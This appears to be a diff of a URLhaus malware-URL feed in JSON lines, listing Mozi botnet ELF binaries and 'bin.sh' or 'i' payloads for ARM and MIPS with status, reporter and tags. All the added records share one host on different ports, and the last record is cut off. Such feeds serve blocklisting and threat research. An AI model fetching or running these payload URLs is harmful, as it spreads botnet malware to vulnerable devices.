-{"id":"961079","urlhaus_reference":"https://urlhaus.abuse.ch/url/961079/","url":"http://58.248.113.219:44518/Mozi.a","url_status":"online","host":"58.248.113.219","date_added":"2021-01-14 17:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961080","urlhaus_reference":"https://urlhaus.abuse.ch/url/961080/","url":"http://58.249.22.124:50389/Mozi.m","url_status":"online","host":"58.249.22.124","date_added":"2021-01-14 17:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961077","urlhaus_reference":"https://urlhaus.abuse.ch/url/961077/","url":"http://42.224.241.176:34335/Mozi.m","url_status":"online","host":"42.224.241.176","date_added":"2021-01-14 17:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961069","urlhaus_reference":"https://urlhaus.abuse.ch/url/961069/","url":"http://42.234.234.40:54865/Mozi.m","url_status":"online","host":"42.234.234.40","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961070","urlhaus_reference":"https://urlhaus.abuse.ch/url/961070/","url":"http://27.41.216.92:50773/Mozi.a","url_status":"online","host":"27.41.216.92","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961071","urlhaus_reference":"https://urlhaus.abuse.ch/url/961071/","url":"http://42.237.56.242:52005/Mozi.m","url_status":"online","host":"42.237.56.242","date_added":"2021-01-14 17:06:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961072","urlhaus_reference":"https://urlhaus.abuse.ch/url/961072/","url":"http://222.139.126.241:56066/Mozi.m","url_status":"online","host":"222.139.126.241","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961073","urlhaus_reference":"https://urlhaus.abuse.ch/url/961073/","url":"http://222.137.133.120:32915/Mozi.m","url_status":"online","host":"222.137.133.120","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961074","urlhaus_reference":"https://urlhaus.abuse.ch/url/961074/","url":"http://222.137.123.31:43462/Mozi.a","url_status":"online","host":"222.137.123.31","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961075","urlhaus_reference":"https://urlhaus.abuse.ch/url/961075/","url":"http://219.157.163.74:33291/Mozi.m","url_status":"online","host":"219.157.163.74","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961076","urlhaus_reference":"https://urlhaus.abuse.ch/url/961076/","url":"http://220.125.119.222:1440/Mozi.m","url_status":"offline","host":"220.125.119.222","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961068","urlhaus_reference":"https://urlhaus.abuse.ch/url/961068/","url":"http://123.10.35.174:55907/Mozi.a","url_status":"online","host":"123.10.35.174","date_added":"2021-01-14 17:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961066","urlhaus_reference":"https://urlhaus.abuse.ch/url/961066/","url":"http://117.247.201.31:33181/Mozi.a","url_status":"offline","host":"117.247.201.31","date_added":"2021-01-14 17:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961067","urlhaus_reference":"https://urlhaus.abuse.ch/url/961067/","url":"http://182.121.150.204:44691/Mozi.m","url_status":"online","host":"182.121.150.204","date_added":"2021-01-14 17:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961059","urlhaus_reference":"https://urlhaus.abuse.ch/url/961059/","url":"http://125.42.26.224:55254/Mozi.m","url_status":"online","host":"125.42.26.224","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961060","urlhaus_reference":"https://urlhaus.abuse.ch/url/961060/","url":"http://186.33.123.24:43010/Mozi.m","url_status":"online","host":"186.33.123.24","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961061","urlhaus_reference":"https://urlhaus.abuse.ch/url/961061/","url":"http://125.41.217.246:37886/Mozi.m","url_status":"offline","host":"125.41.217.246","date_added":"2021-01-14 17:05:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961062","urlhaus_reference":"https://urlhaus.abuse.ch/url/961062/","url":"http://182.116.77.111:40153/Mozi.m","url_status":"online","host":"182.116.77.111","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961063","urlhaus_reference":"https://urlhaus.abuse.ch/url/961063/","url":"http://182.117.92.19:34305/Mozi.a","url_status":"online","host":"182.117.92.19","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961064","urlhaus_reference":"https://urlhaus.abuse.ch/url/961064/","url":"http://182.127.97.21:35653/Mozi.m","url_status":"online","host":"182.127.97.21","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961065","urlhaus_reference":"https://urlhaus.abuse.ch/url/961065/","url":"http://117.242.209.98:48908/Mozi.m","url_status":"offline","host":"117.242.209.98","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961058","urlhaus_reference":"https://urlhaus.abuse.ch/url/961058/","url":"http://113.118.12.200:40035/Mozi.m","url_status":"online","host":"113.118.12.200","date_added":"2021-01-14 17:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961055","urlhaus_reference":"https://urlhaus.abuse.ch/url/961055/","url":"http://117.222.166.125:54461/Mozi.a","url_status":"offline","host":"117.222.166.125","date_added":"2021-01-14 17:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961056","urlhaus_reference":"https://urlhaus.abuse.ch/url/961056/","url":"http://116.75.214.130:51991/Mozi.m","url_status":"offline","host":"116.75.214.130","date_added":"2021-01-14 17:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961057","urlhaus_reference":"https://urlhaus.abuse.ch/url/961057/","url":"http://112.168.65.51:41143/i","url_status":"online","host":"112.168.65.51","date_added":"2021-01-14 17:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961054","urlhaus_reference":"https://urlhaus.abuse.ch/url/961054/","url":"http://221.15.254.11:51095/i","url_status":"online","host":"221.15.254.11","date_added":"2021-01-14 17:02:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961053","urlhaus_reference":"https://urlhaus.abuse.ch/url/961053/","url":"http://58.255.142.90:36558/Mozi.a","url_status":"online","host":"58.255.142.90","date_added":"2021-01-14 16:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961050","urlhaus_reference":"https://urlhaus.abuse.ch/url/961050/","url":"http://59.96.37.94:47548/Mozi.m","url_status":"offline","host":"59.96.37.94","date_added":"2021-01-14 16:52:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961051","urlhaus_reference":"https://urlhaus.abuse.ch/url/961051/","url":"http://59.97.172.183:35796/Mozi.m","url_status":"offline","host":"59.97.172.183","date_added":"2021-01-14 16:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961052","urlhaus_reference":"https://urlhaus.abuse.ch/url/961052/","url":"http://58.255.142.229:42765/Mozi.m","url_status":"online","host":"58.255.142.229","date_added":"2021-01-14 16:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961048","urlhaus_reference":"https://urlhaus.abuse.ch/url/961048/","url":"http://189.51.106.169:37388/Mozi.a","url_status":"offline","host":"189.51.106.169","date_added":"2021-01-14 16:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961049","urlhaus_reference":"https://urlhaus.abuse.ch/url/961049/","url":"http://222.140.170.6:56849/Mozi.m","url_status":"online","host":"222.140.170.6","date_added":"2021-01-14 16:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961047","urlhaus_reference":"https://urlhaus.abuse.ch/url/961047/","url":"http://186.33.123.64:35574/Mozi.m","url_status":"online","host":"186.33.123.64","date_added":"2021-01-14 16:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961046","urlhaus_reference":"https://urlhaus.abuse.ch/url/961046/","url":"http://123.10.187.158:46947/Mozi.m","url_status":"online","host":"123.10.187.158","date_added":"2021-01-14 16:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961043","urlhaus_reference":"https://urlhaus.abuse.ch/url/961043/","url":"http://117.192.226.243:34452/Mozi.m","url_status":"offline","host":"117.192.226.243","date_added":"2021-01-14 16:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961044","urlhaus_reference":"https://urlhaus.abuse.ch/url/961044/","url":"http://119.123.223.174:33017/Mozi.m","url_status":"offline","host":"119.123.223.174","date_added":"2021-01-14 16:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961045","urlhaus_reference":"https://urlhaus.abuse.ch/url/961045/","url":"http://115.58.133.223:55061/Mozi.m","url_status":"online","host":"115.58.133.223","date_added":"2021-01-14 16:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961040","urlhaus_reference":"https://urlhaus.abuse.ch/url/961040/","url":"http://115.63.36.66:50046/Mozi.m","url_status":"online","host":"115.63.36.66","date_added":"2021-01-14 16:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961041","urlhaus_reference":"https://urlhaus.abuse.ch/url/961041/","url":"http://115.56.133.53:51960/Mozi.a","url_status":"online","host":"115.56.133.53","date_added":"2021-01-14 16:50:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961042","urlhaus_reference":"https://urlhaus.abuse.ch/url/961042/","url":"http://117.247.203.62:42372/Mozi.m","url_status":"offline","host":"117.247.203.62","date_added":"2021-01-14 16:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961039","urlhaus_reference":"https://urlhaus.abuse.ch/url/961039/","url":"http://113.88.211.251:51592/Mozi.m","url_status":"offline","host":"113.88.211.251","date_added":"2021-01-14 16:49:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961038","urlhaus_reference":"https://urlhaus.abuse.ch/url/961038/","url":"http://103.146.233.126:35585/Mozi.a","url_status":"offline","host":"103.146.233.126","date_added":"2021-01-14 16:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961035","urlhaus_reference":"https://urlhaus.abuse.ch/url/961035/","url":"http://115.51.91.178:38398/Mozi.m","url_status":"online","host":"115.51.91.178","date_added":"2021-01-14 16:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961036","urlhaus_reference":"https://urlhaus.abuse.ch/url/961036/","url":"http://115.55.60.104:59880/Mozi.m","url_status":"online","host":"115.55.60.104","date_added":"2021-01-14 16:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961037","urlhaus_reference":"https://urlhaus.abuse.ch/url/961037/","url":"http://113.92.158.127:39138/Mozi.a","url_status":"online","host":"113.92.158.127","date_added":"2021-01-14 16:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961033","urlhaus_reference":"https://urlhaus.abuse.ch/url/961033/","url":"http://221.15.254.11:51095/bin.sh","url_status":"online","host":"221.15.254.11","date_added":"2021-01-14 16:40:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961034","urlhaus_reference":"https://urlhaus.abuse.ch/url/961034/","url":"http://115.56.31.76:45117/i","url_status":"online","host":"115.56.31.76","date_added":"2021-01-14 16:40:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961032","urlhaus_reference":"https://urlhaus.abuse.ch/url/961032/","url":"http://59.13.193.79:50204/Mozi.m","url_status":"online","host":"59.13.193.79","date_added":"2021-01-14 16:37:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961029","urlhaus_reference":"https://urlhaus.abuse.ch/url/961029/","url":"http://59.93.18.69:45079/Mozi.m","url_status":"offline","host":"59.93.18.69","date_added":"2021-01-14 16:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961030","urlhaus_reference":"https://urlhaus.abuse.ch/url/961030/","url":"http://59.99.136.43:52238/Mozi.m","url_status":"offline","host":"59.99.136.43","date_added":"2021-01-14 16:37:06 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961031","urlhaus_reference":"https://urlhaus.abuse.ch/url/961031/","url":"http://42.230.66.23:40312/Mozi.m","url_status":"online","host":"42.230.66.23","date_added":"2021-01-14 16:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961026","urlhaus_reference":"https://urlhaus.abuse.ch/url/961026/","url":"http://59.97.169.179:39002/Mozi.a","url_status":"offline","host":"59.97.169.179","date_added":"2021-01-14 16:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961027","urlhaus_reference":"https://urlhaus.abuse.ch/url/961027/","url":"http://27.41.216.92:50773/Mozi.m","url_status":"online","host":"27.41.216.92","date_added":"2021-01-14 16:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961028","urlhaus_reference":"https://urlhaus.abuse.ch/url/961028/","url":"http://59.96.39.140:50050/Mozi.m","url_status":"offline","host":"59.96.39.140","date_added":"2021-01-14 16:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961024","urlhaus_reference":"https://urlhaus.abuse.ch/url/961024/","url":"http://182.59.203.162:60081/Mozi.m","url_status":"offline","host":"182.59.203.162","date_added":"2021-01-14 16:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961025","urlhaus_reference":"https://urlhaus.abuse.ch/url/961025/","url":"http://186.33.122.4:58177/Mozi.m","url_status":"online","host":"186.33.122.4","date_added":"2021-01-14 16:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961023","urlhaus_reference":"https://urlhaus.abuse.ch/url/961023/","url":"http://125.41.164.93:38589/Mozi.m","url_status":"online","host":"125.41.164.93","date_added":"2021-01-14 16:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961022","urlhaus_reference":"https://urlhaus.abuse.ch/url/961022/","url":"http://182.120.42.220:39229/Mozi.a","url_status":"online","host":"182.120.42.220","date_added":"2021-01-14 16:35:25 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961021","urlhaus_reference":"https://urlhaus.abuse.ch/url/961021/","url":"http://121.181.32.38:53595/Mozi.a","url_status":"offline","host":"121.181.32.38","date_added":"2021-01-14 16:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961018","urlhaus_reference":"https://urlhaus.abuse.ch/url/961018/","url":"http://182.119.207.249:57279/Mozi.m","url_status":"online","host":"182.119.207.249","date_added":"2021-01-14 16:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961019","urlhaus_reference":"https://urlhaus.abuse.ch/url/961019/","url":"http://182.116.117.139:49019/Mozi.m","url_status":"online","host":"182.116.117.139","date_added":"2021-01-14 16:35:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961020","urlhaus_reference":"https://urlhaus.abuse.ch/url/961020/","url":"http://182.121.150.84:48558/Mozi.m","url_status":"offline","host":"182.121.150.84","date_added":"2021-01-14 16:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961017","urlhaus_reference":"https://urlhaus.abuse.ch/url/961017/","url":"http://120.85.167.142:58913/Mozi.a","url_status":"online","host":"120.85.167.142","date_added":"2021-01-14 16:34:25 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961016","urlhaus_reference":"https://urlhaus.abuse.ch/url/961016/","url":"http://115.58.68.51:49608/Mozi.m","url_status":"online","host":"115.58.68.51","date_added":"2021-01-14 16:34:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961013","urlhaus_reference":"https://urlhaus.abuse.ch/url/961013/","url":"http://112.168.65.51:41143/bin.sh","url_status":"online","host":"112.168.65.51","date_added":"2021-01-14 16:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961014","urlhaus_reference":"https://urlhaus.abuse.ch/url/961014/","url":"http://117.247.204.147:42129/Mozi.m","url_status":"offline","host":"117.247.204.147","date_added":"2021-01-14 16:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961015","urlhaus_reference":"https://urlhaus.abuse.ch/url/961015/","url":"http://117.247.204.127:47403/Mozi.m","url_status":"offline","host":"117.247.204.127","date_added":"2021-01-14 16:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961011","urlhaus_reference":"https://urlhaus.abuse.ch/url/961011/","url":"http://120.85.184.207:60187/Mozi.m","url_status":"online","host":"120.85.184.207","date_added":"2021-01-14 16:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961012","urlhaus_reference":"https://urlhaus.abuse.ch/url/961012/","url":"http://117.202.70.191:46097/Mozi.m","url_status":"offline","host":"117.202.70.191","date_added":"2021-01-14 16:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961010","urlhaus_reference":"https://urlhaus.abuse.ch/url/961010/","url":"http://211.223.74.229:50771/i","url_status":"online","host":"211.223.74.229","date_added":"2021-01-14 16:31:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961216","urlhaus_reference":"https://urlhaus.abuse.ch/url/961216/","url":"http://89.160.20.156:43741/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:44:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961215","urlhaus_reference":"https://urlhaus.abuse.ch/url/961215/","url":"http://89.160.20.156:45803/bin.sh","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:41:10 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"false","tags":["32-bit","elf","mips"]} +{"id":"961214","urlhaus_reference":"https://urlhaus.abuse.ch/url/961214/","url":"http://89.160.20.156:38611/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:36:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961213","urlhaus_reference":"https://urlhaus.abuse.ch/url/961213/","url":"http://89.160.20.156:35185/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:36:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961212","urlhaus_reference":"https://urlhaus.abuse.ch/url/961212/","url":"http://89.160.20.156:35054/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961207","urlhaus_reference":"https://urlhaus.abuse.ch/url/961207/","url":"http://89.160.20.156:60038/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961208","urlhaus_reference":"https://urlhaus.abuse.ch/url/961208/","url":"http://89.160.20.156:52253/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961209","urlhaus_reference":"https://urlhaus.abuse.ch/url/961209/","url":"http://89.160.20.156:43125/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961210","urlhaus_reference":"https://urlhaus.abuse.ch/url/961210/","url":"http://89.160.20.156:52650/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961211","urlhaus_reference":"https://urlhaus.abuse.ch/url/961211/","url":"http://89.160.20.156:59273/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961206","urlhaus_reference":"https://urlhaus.abuse.ch/url/961206/","url":"http://89.160.20.156:40346/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:35:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961204","urlhaus_reference":"https://urlhaus.abuse.ch/url/961204/","url":"http://89.160.20.156:44242/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961205","urlhaus_reference":"https://urlhaus.abuse.ch/url/961205/","url":"http://89.160.20.156:40624/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:35:07 
